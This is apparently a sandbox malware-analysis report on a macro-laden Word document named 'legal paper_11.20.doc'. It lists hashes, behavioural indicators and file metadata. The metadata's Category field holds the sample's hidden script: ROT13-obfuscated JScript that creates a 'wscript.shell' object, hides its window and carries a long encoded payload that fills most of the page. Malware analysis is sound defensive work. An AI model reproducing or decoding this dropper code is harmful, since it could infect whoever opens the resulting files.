analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

legal paper_11.20.doc

Full analysis: https://app.any.run/tasks/9099ac4d-73fd-4dd0-8c18-8257e1e724b3
Verdict: Malicious activity
Analysis date: November 30, 2020, 02:10:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

CB95F31870B1CE2552452944F98DB032

SHA1:

FC8DDBE6D37008E77B87307EDD9097A74F6C4EA0

SHA256:

48D9E53E3B201E2658EBA607B35571DB95B67DD10E7294473E98A6B748895EAC

SSDEEP:

1536:kpwG7pIOzwM4AepXZvhgYhY6Mob5eUyFevIMSQBdNAs+qzQ:kpw6pxzdRSLSobB+evGQBdNJk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • in.com (PID: 1628)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1228)
    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 1228)
  • SUSPICIOUS

    • Reads internet explorer settings

      • in.com (PID: 1628)
    • Drops a file that was compiled in debug mode

      • WINWORD.EXE (PID: 1228)
    • Starts application with an unusual extension

      • WINWORD.EXE (PID: 1228)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1228)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x0c0cc35b
ZipCompressedSize: 400
ZipUncompressedSize: 1505
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: -
Characters: -
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: -
ScaleCrop: No
Manager: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: -
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: [email protected]
RevisionNumber: 2
CreateDate: 2020:11:04 19:13:00Z
ModifyDate: 2020:11:04 19:13:00Z
Category: <ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> nvWHM = -44759; ine nqDE2 = -45058; ine noxZdf = -15667; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) | (rap2 >> 4); pue2 = ((rap2 & 15) << 4) | (rap3 >> 2); pue3 = ((rap3 & 3) << 6) | rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } nsO0T = gehr; n093cE = gehr; ine nC1qZ = "UXRL_PHEERAG_HFRE\\Fbsgjner\\zlfbsgjner1\\xrl1"; nZIX0 = 18884; jvaqbj.erfvmrGb(1, 1); ine n5jkZn = gehr; nfLcS = "n14kl"; ine nW2Ss = nfLcS.yratgu; jvaqbj.zbirGb(-101, -101); ine nGfbF = "nJKLVj"; ine nx9E8 = arj NpgvirKBowrpg("jfpevcg.furyy"); ine ntqHB = 12251; ine nKbAOc = 28314; n1cMWo = gehr; nleqd1 = snyfr; ine np3Ge = "LJyinUx4nJ9brKOco2u5ITyinUygnJ9brFOco2u5CJyinUxtnJ9brJMco2u5LJyinUyfnJ9brKAco2u5MJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUx3nJ9brGWco2u5HJyinUyynJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUyKnJ9brGWco2u5H2yinUyHnJ9brJEco2u5VzyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUy3nJ9brJyco2u5oJyinUyGnJ9brFOco2u5CJyinUxtnJ9brJSco2u5A2yinUxlnJ9brISco2u5MJyinUxhnJ9brJkco2u5MJyinUyhnJ9brJqco2u5qTyinUybnJ9brGgco2u5MzyinUy1nJ9brJ5co2u5L2yinUy0nJ9brJyco2u5o2yinUyhnJ9brFOco2u5MTyinUyynJ9brJAco2u5o2yinUyxnJ9brJIco2u5XTyinUycnJ9brJ5co2u5pTyinUy1nJ9brKEco2u5XJyinUy7nJ9brKMco2u5LJyinUylnJ9brFOco2u5n2yinUyynJ9brKyco2u5p2yinUy0nJ9brKWco2u5VTyinUx9nJ9brFOco2u5VzyinUyOnJ9brHWco2u5D2yinUyRnJ9brHIco2u5EzyinUyUnJ9brHuco2u5FJyinUyXnJ9brHgco2u5GTyinUyAnJ9brH5co2u5G2yinUyDnJ9brISco2u5HzyinUyGnJ9brIEco2u5IJyinUyJnJ9brIqco2u5JTyinUyMnJ9brIcco2u5LJyinUyvnJ9brJAco2u5MTyinUyynJ9brJMco2u5M2yinUybnJ9brJyco2u5nzyinUyenJ9brJkco2u5oJyinUyhnJ9brJ9co2u5pTyinUyknJ9brKWco2u5p2yinUy0nJ9brKIco2u5qzyinUy3nJ9brKuco2u5rJyinUy6nJ9brGOco2u5ZJyinUxlnJ9brGAco2u5ATyinUx1nJ9brGMco2u5A2yinUx4nJ9brGyco2u5X2yinUxinJ9brG1co2u5VzyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5o2yinUy1nJ9brKEco2u5pTyinUy1nJ9brKEco2u5VTyinUx9nJ9brFOco2u5VzyinUxvnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUywnJ9brJuco2u5pzyinUxknJ9brFkco2u5VTyinUywnJ9brJuco2u5pzyinUxlnJ9brFkco2u5VTyinUywnJ9brJuco2u5pzyinUxmnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyynJ9brJ5co2u5L2yinUxknJ9brFkco2u5VTyinUyynJ9brJ5co2u5L2yinUxlnJ9brFkco2u5VTyinUyynJ9brJ5co2u5L2yinUxmnJ9brFkco2u5VTyinUyynJ9brJ5co2u5L2yinUx0nJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUycnJ9brFOco2u5CJyinUxtnJ9brGOco2u5B2yinUycnJ9brJ5co2u5pTyinUy1nJ9brKEco2u5VTyinUx9nJ9brFOco2u5nJyinUyhnJ9brKOco2u5qJyinUy0nJ9brF5co2u5pzyinUyynJ9brKOco2u5oTyinUyunJ9brJAco2u5MJyinUxbnJ9brF9co2u5J2yinUyrnJ9brHSco2u5YJyinUynnJ9brJSco2u5YJyinUy6nJ9brGOco2u5YJyinUx5nJ9brIkco2u5X2yinUypnJ9brF9co2u5KTyinUx9nJ9brI1co2u5Y2yinUyanJ9brFkco2u5VTyinUxvnJ9brFWco2u5XJyinUx7nJ9brKqco2u5nTyinUycnJ9brJkco2u5MJyinUxtnJ9brFuco2u5nJyinUxtnJ9brGkco2u5VTyinUycnJ9brJ5co2u5pTyinUy1nJ9brKEco2u5YzyinUyfnJ9brJIco2u5ozyinUyanJ9brKEco2u5nTyinUxcnJ9brKgco2u5MJyinUyhnJ9brJAco2u5ZJyinUxtnJ9brG1co2u5VTyinUyenJ9brJIco2u5rJyinUymnJ9brKEco2u5pzyinUxhnJ9brJyco2u5ozyinUyxnJ9brJIco2u5rTyinUyCnJ9brJMco2u5XTyinUycnJ9brJ5co2u5pTyinUy1nJ9brKEco2u5YzyinUywnJ9brJuco2u5LJyinUylnJ9brHSco2u5qTyinUxbnJ9brJyco2u5X2yinUxenJ9brFyco2u5XJyinUx7nJ9brJIco2u5ozyinUywnJ9brGWco2u5VTyinUx9nJ9brFOco2u5n2yinUyynJ9brKyco2u5p2yinUy0nJ9brKWco2u5YzyinUycnJ9brJ5co2u5MTyinUyynJ9brKuco2u5G2yinUyznJ9brFuco2u5nJyinUyhnJ9brKOco2u5qJyinUy0nJ9brF5co2u5L2yinUybnJ9brJSco2u5pzyinUyOnJ9brKEco2u5XTyinUycnJ9brFgco2u5X2yinUxcnJ9brFyco2u5B2yinUyynJ9brJ5co2u5L2yinUxmnJ9brFOco2u5CJyinUxtnJ9brJgco2u5MJyinUy5nJ9brKAco2u5qTyinUylnJ9brF5co2u5nJyinUyhnJ9brJEco2u5MJyinUy4nJ9brH9co2u5MzyinUxbnJ9brJyco2u5ozyinUyjnJ9brKIco2u5qTyinUxhnJ9brJAco2u5nTyinUyunJ9brKWco2u5DJyinUy0nJ9brFuco2u5nJyinUxenJ9brFgco2u5XJyinUxcnJ9brGgco2u5MJyinUyhnJ9brJAco2u5ATyinUxtnJ9brG1co2u5VTyinUyenJ9brJIco2u5rJyinUymnJ9brKEco2u5pzyinUxhnJ9brJyco2u5ozyinUyxnJ9brJIco2u5rTyinUyCnJ9brJMco2u5XTyinUycnJ9brJ5co2u5pTyinUy1nJ9brKEco2u5YzyinUywnJ9brJuco2u5LJyinUylnJ9brHSco2u5qTyinUxbnJ9brJyco2u5X2yinUxenJ9brFyco2u5XJyinUx7nJ9brJAco2u5nTyinUylnJ9brGSco2u5VTyinUx9nJ9brFOco2u5XTyinUyynJ9brJ5co2u5L2yinUxknJ9brFOco2u5CTyinUx8nJ9brFOco2u5ZzyinUxcnJ9brFOco2u5sTyinUxtnJ9brFuco2u5MJyinUyhnJ9brJAco2u5ZzyinUxtnJ9brG5co2u5CzyinUxtnJ9brGEco2u5XJyinUx7nJ9brJAco2u5nTyinUylnJ9brGWco2u5VTyinUx9nJ9brFOco2u5XTyinUxbnJ9brJIco2u5ozyinUywnJ9brGWco2u5VTyinUxznJ9brFOco2u5ZJyinUx1nJ9brFyco2u5VTyinUx8nJ9brGkco2u5VTyinUx0nJ9brFyco2u5VTyinUy8nJ9brFOco2u5XTyinUyynJ9brJ5co2u5L2yinUxmnJ9brFOco2u5CzyinUx+nJ9brFOco2u5ZzyinUxcnJ9brGgco2u5L2yinUybnJ9brKWco2u5Z2yinUxtnJ9brG1co2u5VTyinUxbnJ9brFuco2u5MJyinUyhnJ9brJAco2u5Z2yinUxtnJ9brFMco2u5VTyinUxmnJ9brFyco2u5VTyinUx8nJ9brGkco2u5VTyinUx2nJ9brFyco2u5VTyinUy8nJ9brFOco2u5MJyinUyhnJ9brJAco2u5ATyinUx7nJ9brJ9co2u5qJyinUy0nJ9brKOco2u5qJyinUy0nJ9brFOco2u5CJyinUxtnJ9brJ9co2u5qJyinUy0nJ9brKOco2u5qJyinUy0nJ9brFOco2u5X2yinUxtnJ9brIAco2u5qTyinUylnJ9brJyco2u5ozyinUyanJ9brF5co2u5MzyinUylnJ9brJ9co2u5oJyinUyQnJ9brJuco2u5LJyinUylnJ9brHAco2u5o2yinUyxnJ9brJIco2u5XTyinUywnJ9brJuco2u5pzyinUxknJ9brFyco2u5B2yinUycnJ9brJMco2u5XTyinUyynJ9brJ5co2u5L2yinUxmnJ9brFOco2u5VJyinUx9nJ9brFOco2u5AzyinUx0nJ9brFyco2u5r2yinUyinJ9brKIco2u5qTyinUyjnJ9brKIco2u5qTyinUxtnJ9brG1co2u5VTyinUyinJ9brKIco2u5qTyinUyjnJ9brKIco2u5qTyinUxtnJ9brFgco2u5VTyinUyGnJ9brKEco2u5pzyinUycnJ9brJ5co2u5M2yinUxhnJ9brJMco2u5pzyinUyinJ9brJ1co2u5D2yinUybnJ9brJSco2u5pzyinUyQnJ9brJ9co2u5MTyinUyynJ9brFuco2u5L2yinUybnJ9brKWco2u5ZzyinUxcnJ9brGgco2u5sJyinUycnJ9brJMco2u5XTyinUyynJ9brJ5co2u5L2yinUx0nJ9brFOco2u5VJyinUx9nJ9brFOco2u5AzyinUx0nJ9brFyco2u5r2yinUyinJ9brKIco2u5qTyinUyjnJ9brKIco2u5qTyinUxtnJ9brG1co2u5VTyinUyinJ9brKIco2u5qTyinUyjnJ9brKIco2u5qTyinUxtnJ9brFgco2u5VTyinUyGnJ9brKEco2u5pzyinUycnJ9brJ5co2u5M2yinUxhnJ9brJMco2u5pzyinUyinJ9brJ1co2u5D2yinUybnJ9brJSco2u5pzyinUyQnJ9brJ9co2u5MTyinUyynJ9brFuco2u5L2yinUybnJ9brKWco2u5Z2yinUxcnJ9brGgco2u5sJyinUy9nJ9brKWco2u5MJyinUy0nJ9brKIco2u5pzyinUyhnJ9brFuco2u5o2yinUy1nJ9brKEco2u5pTyinUy1nJ9brKEco2u5XJyinUx7nJ9brK1co2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brJWco2u5p2yinUyxnJ9brJMco2u5JJyinUxtnJ9brG1co2u5VTyinUxvnJ9brJSco2u5p2yinUyynJ9brHSco2u5oTyinUy5nJ9brFWco2u5B2yinUyunJ9brKcco2u5o2yinUx5nJ9brIEco2u5VTyinUx9nJ9brFOco2u5LJyinUyvnJ9brKAco2u5MTyinUyznJ9brIyco2u5YzyinUy0nJ9brJ9co2u5GTyinUyinJ9brKqco2u5MJyinUylnJ9brHAco2u5LJyinUymnJ9brJIco2u5XTyinUxcnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brJ1co2u5EzyinUx4nJ9brHEco2u5VTyinUx9nJ9brFOco2u5YJyinUx2nJ9brGEco2u5Z2yinUxmnJ9brGIco2u5B2yinUyznJ9brKIco2u5ozyinUywnJ9brKEco2u5nJyinUyinJ9brJ5co2u5VTyinUyunJ9brJuco2u5JzyinUy1nJ9brKWco2u5XTyinUyunJ9brKyco2u5rTyinUx4nJ9brGAco2u5p2yinUxcnJ9brKgco2u5pzyinUyynJ9brKEco2u5qJyinUylnJ9brJ5co2u5XTyinUyunJ9brKyco2u5rTyinUx4nJ9brGAco2u5p2yinUxhnJ9brKAco2u5pTyinUyfnJ9brJyco2u5qTyinUxbnJ9brFWco2u5VzyinUxcnJ9brF5co2u5pzyinUyynJ9brKMco2u5MJyinUylnJ9brKAco2u5MJyinUxbnJ9brFyco2u5YzyinUydnJ9brJ9co2u5nJyinUyhnJ9brFuco2u5VzyinUxvnJ9brFyco2u5XJyinUx7nJ9brK1co2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brGSco2u5rTyinUx4nJ9brGyco2u5VTyinUx9nJ9brFOco2u5ATyinUx1nJ9brGqco2u5A2yinUxmnJ9brGgco2u5LJyinUy6nJ9brJkco2u5GJyinUynnJ9brJIco2u5VTyinUx9nJ9brFOco2u5qTyinUylnJ9brKIco2u5MJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyhnJ9brHEco2u5JzyinUyYnJ9brFOco2u5CJyinUxtnJ9brJ5co2u5MJyinUy3nJ9brFOco2u5DJyinUywnJ9brKEco2u5nJyinUy2nJ9brJIco2u5JTyinUyCnJ9brJWco2u5nzyinUyynJ9brJAco2u5qTyinUxbnJ9brFWco2u5oJyinUymnJ9brKuco2u5oJyinUyfnJ9brGWco2u5YzyinUy4nJ9brJ1co2u5oTyinUybnJ9brKEco2u5qTyinUyjnJ9brFWco2u5XJyinUx7nJ9brJSco2u5o2yinUyXnJ9brKAco2u5DzyinUy2nJ9brFOco2u5CJyinUxtnJ9brKEco2u5pzyinUy1nJ9brJIco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5EzyinUyZnJ9brJkco2u5qJyinUxtnJ9brG1co2u5VTyinUxgnJ9brGIco2u5ATyinUxlnJ9brGIco2u5ZTyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyunJ9brJ9co2u5H2yinUx0nJ9brGOco2u5VTyinUx9nJ9brFOco2u5ozyinUyynJ9brKqco2u5VTyinUyOnJ9brJAco2u5qTyinUycnJ9brKMco2u5MJyinUyLnJ9brH9co2u5LzyinUydnJ9brJIco2u5L2yinUy0nJ9brFuco2u5VzyinUyunJ9brJEco2u5o2yinUyxnJ9brJWco2u5YzyinUymnJ9brKEco2u5pzyinUyynJ9brJSco2u5oJyinUxvnJ9brFyco2u5B2yinUyunJ9brJAco2u5ZzyinUyKnJ9brHyco2u5VTyinUx9nJ9brFOco2u5YJyinUxlnJ9brGMco2u5ATyinUxjnJ9brGMco2u5B2yinUyunJ9brIWco2u5DzyinUx5nJ9brJuco2u5rTyinUxtnJ9brG1co2u5VTyinUxgnJ9brGAco2u5AJyinUxmnJ9brGuco2u5A2yinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyLnJ9brGOco2u5pzyinUyHnJ9brFOco2u5CJyinUxtnJ9brJ5co2u5MJyinUy3nJ9brFOco2u5DJyinUywnJ9brKEco2u5nJyinUy2nJ9brJIco2u5JTyinUyCnJ9brJWco2u5nzyinUyynJ9brJAco2u5qTyinUxbnJ9brFWco2u5q2yinUymnJ9brJAco2u5pzyinUycnJ9brKOco2u5qTyinUxhnJ9brKAco2u5nTyinUyynJ9brJkco2u5oTyinUxvnJ9brFyco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5AzyinUyUnJ9brKqco2u5HJyinUxtnJ9brG1co2u5VTyinUyznJ9brJSco2u5oTyinUymnJ9brJIco2u5B2yinUyunJ9brIMco2u5AzyinUyunJ9brHuco2u5VTyinUx9nJ9brFOco2u5LJyinUyLnJ9brGOco2u5pzyinUyHnJ9brF5co2u5MJyinUy4nJ9brKOco2u5LJyinUyhnJ9brJEco2u5MJyinUyhnJ9brKMco2u5nJyinUylnJ9brJ9co2u5ozyinUygnJ9brJIco2u5ozyinUy0nJ9brKAco2u5qTyinUylnJ9brJyco2u5ozyinUyanJ9brKAco2u5XTyinUxvnJ9brFIco2u5qTyinUyynJ9brJ1co2u5pTyinUxynJ9brFWco2u5XJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyWnJ9brJ9co2u5I2yinUy5nJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUyunJ9brKIco2u5ZJyinUydnJ9brGIco2u5VzyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyPnJ9brHgco2u5ZJyinUygnJ9brJgco2u5VTyinUx9nJ9brFOco2u5LJyinUyWnJ9brJ9co2u5I2yinUy5nJ9brF5co2u5qTyinUyinJ9brHkco2u5o2yinUy3nJ9brJIco2u5pzyinUyQnJ9brJSco2u5p2yinUyynJ9brFuco2u5XJyinUx7nJ9brJSco2u5FzyinUycnJ9brGOco2u5F2yinUxtnJ9brG1co2u5VTyinUyznJ9brJSco2u5oTyinUymnJ9brJIco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5ATyinUyFnJ9brISco2u5DzyinUyQnJ9brFOco2u5CJyinUxtnJ9brJMco2u5LJyinUyfnJ9brKAco2u5MJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyznJ9brHkco2u5LJyinUx3nJ9brFOco2u5CJyinUxtnJ9brF1co2u5AJyinUx2nJ9brGEco2u5A2yinUxknJ9brGgco2u5LJyinUy0nJ9brKcco2u5ITyinUyBnJ9brFOco2u5CJyinUxtnJ9brJMco2u5LJyinUyfnJ9brKAco2u5MJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyynJ9brIMco2u5rTyinUywnJ9brKyco2u5VTyinUx9nJ9brFOco2u5VzyinUyunJ9brKIco2u5FJyinUyMnJ9brHWco2u5q2yinUxvnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brIAco2u5LzyinUyInJ9brGSco2u5rJyinUxtnJ9brG1co2u5VTyinUyunJ9brJIco2u5IzyinUy4nJ9brJAco2u5rJyinUxhnJ9brJkco2u5MJyinUyhnJ9brJqco2u5qTyinUybnJ9brGgco2u5LJyinUxknJ9brKAco2u5F2yinUx5nJ9brHSco2u5VTyinUx9nJ9brFOco2u5VzyinUyunJ9brJqco2u5JTyinUyMnJ9brIMco2u5DJyinUxvnJ9brGgco2u5LJyinUyTnJ9brH5co2u5n2yinUyOnJ9brFOco2u5CJyinUxtnJ9brJSco2u5ZJyinUymnJ9brHgco2u5BJyinUyOnJ9brF5co2u5qTyinUyinJ9brHkco2u5o2yinUy3nJ9brJIco2u5pzyinUyQnJ9brJSco2u5p2yinUyynJ9brFuco2u5XJyinUx7nJ9brJSco2u5MTyinUyynJ9brHcco2u5GTyinUxmnJ9brFOco2u5CJyinUxtnJ9brJSco2u5IzyinUx2nJ9brJSco2u5FTyinUxtnJ9brFgco2u5VTyinUyGnJ9brKEco2u5pzyinUycnJ9brJ5co2u5M2yinUxhnJ9brJMco2u5pzyinUyinJ9brJ1co2u5D2yinUybnJ9brJSco2u5pzyinUyQnJ9brJ9co2u5MTyinUyynJ9brFuco2u5BJyinUxlnJ9brFyco2u5VTyinUxenJ9brFOco2u5VzyinUy0nJ9brJIco2u5oJyinUyjnJ9brF5co2u5qTyinUygnJ9brKOco2u5VzyinUx7nJ9brJSco2u5qzyinUylnJ9brJMco2u5JzyinUxtnJ9brG1co2u5VTyinUxvnJ9brJSco2u5BJyinUyjnJ9brGSco2u5IzyinUx3nJ9brFWco2u5B2yinUyunJ9brJ5co2u5ZTyinUx2nJ9brH1co2u5VTyinUx9nJ9brFOco2u5LJyinUy2nJ9brKWco2u5MzyinUynnJ9brF5co2u5qTyinUyinJ9brIAco2u5qTyinUylnJ9brJyco2u5ozyinUyanJ9brFuco2u5XJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyknJ9brIEco2u5ZzyinUy4nJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUygnJ9brJ9co2u5ITyinUyvnJ9brHEco2u5VzyinUx7nJ9brJSco2u5GJyinUyznJ9brIcco2u5rJyinUyZnJ9brFOco2u5CJyinUxtnJ9brJSco2u5pJyinUyHnJ9brGWco2u5rTyinUxhnJ9brKEco2u5o2yinUyGnJ9brKEco2u5pzyinUycnJ9brJ5co2u5M2yinUxbnJ9brFyco2u5B2yinUy1nJ9brFOco2u5CJyinUxtnJ9brJSco2u5nTyinUynnJ9brKIco2u5pzyinUxbnJ9brKIco2u5XJyinUx7nJ9brKIco2u5VTyinUx9nJ9brFOco2u5MTyinUyynJ9brJAco2u5o2yinUyxnJ9brJIco2u5XTyinUy1nJ9brFyco2u5B2yinUyunJ9brH9co2u5pTyinUyXnJ9brIWco2u5VTyinUx9nJ9brFOco2u5YJyinUx3nJ9brGuco2u5ATyinUxjnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brGqco2u5H2yinUyFnJ9brISco2u5FJyinUxtnJ9brG1co2u5VTyinUxgnJ9brGSco2u5BTyinUxjnJ9brGSco2u5ZTyinUx7nJ9brJSco2u5H2yinUyanJ9brGqco2u5MzyinUxtnJ9brG1co2u5VTyinUxvnJ9brJSco2u5HzyinUyWnJ9brJyco2u5JTyinUy4nJ9brFWco2u5B2yinUyunJ9brJyco2u5ATyinUy2nJ9brKAco2u5VTyinUx9nJ9brFOco2u5MzyinUyunJ9brJkco2u5p2yinUyynJ9brGgco2u5LJyinUx1nJ9brJ9co2u5EzyinUx2nJ9brFOco2u5CJyinUxtnJ9brF1co2u5AzyinUxknJ9brGOco2u5AzyinUxmnJ9brGgco2u5LJyinUyhnJ9brHEco2u5JzyinUyYnJ9brF5co2u5o2yinUyjnJ9brJIco2u5ozyinUxbnJ9brFWco2u5E2yinUySnJ9brIEco2u5VzyinUxfnJ9brFOco2u5qJyinUxfnJ9brFOco2u5ZTyinUxcnJ9brGgco2u5LJyinUy0nJ9brJ1co2u5I2yinUy1nJ9brGMco2u5VTyinUx9nJ9brFOco2u5VzyinUyunJ9brIEco2u5nJyinUyTnJ9brH9co2u5VzyinUx7nJ9brJSco2u5AJyinUyWnJ9brH1co2u5rzyinUxtnJ9brG1co2u5VTyinUxvnJ9brJSco2u5IzyinUybnJ9brIWco2u5q2yinUxvnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brHyco2u5LJyinUyQnJ9brH9co2u5JJyinUxtnJ9brG1co2u5VTyinUyunJ9brGIco2u5FJyinUyAnJ9brKcco2u5YzyinUy0nJ9brJ9co2u5H2yinUy0nJ9brKWco2u5nJyinUyhnJ9brJqco2u5XTyinUxcnJ9brGgco2u5LJyinUyhnJ9brHEco2u5JzyinUyYnJ9brF5co2u5p2yinUyynJ9brJ5co2u5MTyinUxbnJ9brFyco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5IJyinUylnJ9brHyco2u5MzyinUxtnJ9brG1co2u5VTyinUxgnJ9brGWco2u5Z2yinUx3nJ9brGqco2u5AzyinUx7nJ9brJSco2u5ITyinUyxnJ9brKEco2u5AzyinUybnJ9brFOco2u5CJyinUxtnJ9brKEco2u5pzyinUy1nJ9brJIco2u5B2yinUycnJ9brJMco2u5XTyinUyunJ9brJ5co2u5ETyinUynnJ9brHgco2u5YzyinUymnJ9brKEco2u5LJyinUy0nJ9brKIco2u5p2yinUxtnJ9brG1co2u5CJyinUxtnJ9brGWco2u5ZTyinUxjnJ9brFOco2u5WzyinUxznJ9brFOco2u5LJyinUyhnJ9brHEco2u5JzyinUyYnJ9brF5co2u5pzyinUyynJ9brJSco2u5MTyinUy5nJ9brKAco2u5qTyinUyunJ9brKEco2u5MJyinUxtnJ9brG1co2u5CJyinUxtnJ9brGEco2u5XJyinUy7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyunJ9brJWco2u5DzyinUx5nJ9brJqco2u5VTyinUx9nJ9brFOco2u5MzyinUyunJ9brJkco2u5p2yinUyynJ9brGgco2u5LJyinUyBnJ9brIAco2u5Z2yinUy1nJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUywnJ9brHIco2u5FzyinUxmnJ9brGWco2u5VzyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUyRnJ9brJqco2u5GJyinUyVnJ9brHcco2u5VTyinUx9nJ9brFOco2u5LJyinUyBnJ9brIAco2u5Z2yinUy1nJ9brF5co2u5qTyinUyinJ9brIIco2u5pTyinUyjnJ9brJIco2u5pzyinUyQnJ9brJSco2u5p2yinUyynJ9brFuco2u5XJyinUx7nJ9brJSco2u5LJyinUyinJ9brIAco2u5ATyinUxjnJ9brF5co2u5o2yinUyjnJ9brJIco2u5ozyinUxbnJ9brFyco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5FzyinUySnJ9brJkco2u5DJyinUxknJ9brFOco2u5CJyinUxtnJ9brF1co2u5ATyinUxmnJ9brGqco2u5ZzyinUx3nJ9brGgco2u5LJyinUyunJ9brJ9co2u5H2yinUx0nJ9brGOco2u5YzyinUy0nJ9brKyco2u5pTyinUyynJ9brFOco2u5CJyinUxtnJ9brGSco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5nzyinUyKnJ9brKMco2u5qTyinUyunJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUxlnJ9brJkco2u5GzyinUy3nJ9brFWco2u5B2yinUyunJ9brHyco2u5AJyinUynnJ9brKIco2u5VTyinUx9nJ9brFOco2u5LJyinUydnJ9brIqco2u5qzyinUy0nJ9brJSco2u5YzyinUy0nJ9brJ9co2u5GTyinUyinJ9brKqco2u5MJyinUylnJ9brHAco2u5LJyinUymnJ9brJIco2u5XTyinUxcnJ9brGgco2u5LJyinUyunJ9brJ9co2u5H2yinUx0nJ9brGOco2u5YzyinUy3nJ9brKWco2u5nJyinUy0nJ9brJIco2u5XTyinUyunJ9brJ5co2u5ETyinUynnJ9brHgco2u5YzyinUylnJ9brJIco2u5p2yinUyjnJ9brJ9co2u5ozyinUymnJ9brJIco2u5LzyinUyinJ9brJEco2u5rJyinUxcnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brH5co2u5qzyinUyXnJ9brJAco2u5pzyinUxtnJ9brG1co2u5VTyinUx3nJ9brGAco2u5BTyinUxknJ9brGgco2u5LJyinUyRnJ9brKOco2u5A2yinUxlnJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUyJnJ9brGqco2u5rJyinUyLnJ9brFWco2u5B2yinUyunJ9brHWco2u5ZzyinUyjnJ9brHMco2u5VTyinUx9nJ9brFOco2u5LJyinUyRnJ9brKOco2u5A2yinUxlnJ9brF5co2u5qTyinUyinJ9brIAco2u5qTyinUylnJ9brJyco2u5ozyinUyanJ9brFuco2u5XJyinUx7nJ9brJSco2u5LJyinUyinJ9brIAco2u5ATyinUxjnJ9brF5co2u5p2yinUyunJ9brKMco2u5MJyinUy0nJ9brJ9co2u5MzyinUycnJ9brJkco2u5MJyinUxbnJ9brJSco2u5MTyinUyynJ9brHcco2u5GTyinUxmnJ9brFkco2u5VTyinUxlnJ9brFyco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5nJyinUy1nJ9brIAco2u5A2yinUyJnJ9brFOco2u5CJyinUxtnJ9brGEco2u5BTyinUx2